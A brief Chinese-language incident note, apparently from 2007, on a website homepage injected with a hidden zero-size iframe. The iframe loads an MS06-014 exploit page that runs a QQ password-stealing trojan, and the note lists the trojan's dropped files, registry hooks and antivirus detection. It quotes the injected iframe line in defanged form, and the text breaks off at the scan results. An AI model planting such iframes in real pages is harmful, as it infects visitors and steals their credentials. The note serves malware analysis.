http://www.gogk.net/1047
网站主页被挂马。
<iframe src=hxxp://www.sex58.net/qq.htm width=0 height=0></iframe>
qq.htm 是利用MS06014漏洞运行1988.exe木马。
1988.exe会释放文件C:\Program Files\Common Files\Microsoft Shared\MSINFO\9898CCE8.dll
C:\Program Files\Common Files\Microsoft Shared\MSINFO\9898CCE8.dat
添加注册表[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
    <{8CCE9898-9898-CCE8-98CC-898CE898CCE8}><C:\Program Files\Common Files\Microsoft Shared\MSINFO\9898CCE8.dll>
HKCR\CLSID\{8CCE9898-9898-CCE8-98CC-898CE898CCE8}\InProcServer32
  注册表值： （默认）
      类型: REG_SZ
      值： C:\Program Files\Common Files\Microsoft Shared\MSINFO\9898CCE8.dll

9898CCE8.dll 卡吧报Trojan-PSW.Win32.QQRob.ik
1988.exe 卡吧不报 卡吧病毒库：2007.3.9 17:32
1988.exe 在线杀毒情况：